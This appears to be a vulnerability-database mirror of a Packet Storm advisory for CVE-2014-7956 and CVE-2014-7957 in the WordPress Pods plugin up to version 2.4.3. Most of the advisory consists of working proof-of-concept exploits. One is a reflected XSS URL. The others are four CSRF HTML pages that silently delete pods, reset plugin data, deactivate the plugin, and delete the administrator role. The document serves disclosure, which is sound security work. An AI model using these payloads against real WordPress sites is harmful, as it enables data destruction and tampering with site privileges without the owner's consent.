Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPietro OlivaPACKETSTORM:129890
HistoryJan 12, 2015 - 12:00 a.m.

WordPress Pods 2.4.3 CSRF / Cross Site Scripting

2015-01-1200:00:00
Pietro Oliva
packetstormsecurity.com
21

0.003 Low

EPSS

Percentile

67.5%

JSON
`Vulnerability title: Wordpress plugin Pods <= 2.4.3 XSS and CSRF vulnerabilities  
vulnerabilities  
Author: Pietro Oliva  
CVE: CVE-2014-7956, CVE-2014-7957  
Product: pods  
Affected version: pods <= 2.4.3  
Vulnerabilities fixed in version: 2.5  
  
  
XSS vulnerability (CVE-2014-7956, authentication is needed):  
http://localhost/wp-admin/admin.php?page=pods&action=edit&id=4"></a><script>alert('xss')</script><!--  
  
  
Multiple CSRF (CVE-2014-7957,authentication needed):  
  
CSRF 1 (bruteforce pods IDs and delete them):  
  
<html>  
<body>  
<script>  
target="http://localhost";  
for (i=0; i<50;i++)  
document.write('<img style="display:none"  
src="'+target+'/wp-admin/admin.php?page=pods&action=delete&id='+i+'">');  
</script>  
</body>  
</html>  
  
CSRF 2 (delete pods plugin data):  
  
<html>  
<body onload="document.forms[0].submit();">  
<form method="post"  
action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&tab=reset">  
<input type="hidden" name="pods_reset" value="Reset Pods settings and data ">  
</form>  
</html>  
  
CSRF 3 (deactivate pods and delete data):  
  
<html>  
<body onload="document.forms[0].submit();">  
<form method="post"  
action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&tab=reset&pods_reset_deactivate=  
Deactivate and Delete Pods data ">  
<input type="hidden" name="pods_reset_deactivate" value=" Deactivate  
and Delete Pods data ">  
</form>  
</html>  
  
CSRF 4 (enable "roles and capabilities" component and delete admin role):  
  
<html>  
<script>  
function continueExecution(){  
document.write('<link rel="stylesheet"  
href="http://localhost/wordpress/wp-admin/admin.php?page=pods-component-roles-and-capabilities&action=delete&id=administrator">');  
}  
document.write('<link rel="stylesheet"  
href="http://localhost/wordpress/wp-admin/admin.php?page=pods-components&action=toggle&id=roles-and-capabilities&toggle=1&toggled=1">');  
setTimeout(continueExecution, 10000);  
</script>  
</html>  
  
CSRF 4 XSS impact:  
  
http://localhost/wp-admin/admin.php?page=pods-components&action=toggle&id=roles-and-capabilities&toggle=1&toggled=111111111"  
onmouseenter="alert('xss')"  
style="width:3000px;height:1000px;left:0px;top:0px;position:absolute;opacity:0;"></a><!--  
`

Related

securityvulns 2
wpvulndb 1
patchstack 2
cvelist 2
prion 2
cve 2
securityvulns
securityvulns
Wordpress plugin Pods &lt;= 2.4.3 XSS and CSRF vulnerabilities
2015-01-19 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-01-19 00:00:00
wpvulndb
wpvulndb
Pods <= 2.4.3 - Authenticated XSS & CSRF
2015-01-12 09:08:48
patchstack
patchstack
WordPress Pods Plugin <= 2.4 - XSS
2014-10-07 00:00:00
WordPress Pods Plugin <= 2.4 - Multiple CSRF
2014-10-07 00:00:00
cvelist
cvelist
CVE-2014-7956
2015-01-15 15:00:00
CVE-2014-7957
2015-01-15 15:00:00
prion
prion
Cross site scripting
2015-01-15 15:59:00
Cross site request forgery (csrf)
2015-01-15 15:59:00
cve
cve
CVE-2014-7956
2015-01-15 15:59:00
CVE-2014-7957
2015-01-15 15:59:00

0.003 Low

EPSS

Percentile

67.5%

JSON
Related for PACKETSTORM:129890
securityvulns2wpvulndb1patchstack2cvelist2prion2cve2